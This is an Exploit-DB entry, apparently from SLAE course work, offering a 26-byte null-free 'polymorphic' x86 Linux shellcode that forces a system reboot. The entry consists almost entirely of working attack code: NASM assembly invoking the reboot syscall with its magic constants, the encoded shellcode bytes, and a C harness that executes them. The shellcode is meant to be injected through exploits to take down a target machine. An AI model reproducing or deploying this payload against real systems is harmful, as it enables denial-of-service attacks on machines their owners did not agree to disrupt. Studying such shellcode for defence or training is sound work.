Linux/x86 - Reboot + Polymorphic Shellcode (26 bytes)

EDB-ID:

48243

CVE:

N/A


Author:

Upayan


Platform:

Linux_x86

Date:

2020-03-23


# Exploit Title: Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)
# Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot.
# Date: 2020-03-23
# Author: Upayan a.k.a. slaeryan
# Contact: upayansaha@icloud.com
# SLAE: 1525
# Vendor Homepage: None
# Software Link: None
# Tested on: Linux x86
# CVE: N/A


/*
; Filename: reboot_polymorphic.nasm
; Author: Upayan a.k.a. slaeryan
; SLAE: 1525
; Contact: upayansaha@icloud.com
; Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot.
; Testing: ./reboot_polymorphic
; Compile with: ./compile.sh reboot_polymorphic
; Size of shellcode: 26 bytes

global _start			

section .text
_start:
	xor eax, eax                ; Clearing the EAX register
    xor ebx, ebx                ; Clearing the EBX register
    xor ecx, ecx                ; Clearing the ECX register
    cdq                         ; Clearing the EDX register
    mov al, 0x58                ; Loading syscall value = 0x58 for reboot in AL
    mov ebx, 0xfee1dead         ; Loading magic 1 in EBX
    mov ecx, 672274793          ; Loading magic 2 in ECX
    mov edx, 0x1234567          ; Loading cmd val = LINUX_REBOOT_CMD_RESTART in EDX
    int 0x80                    ; Executing the reboot syscall

*/


#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";

void main()
{

	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}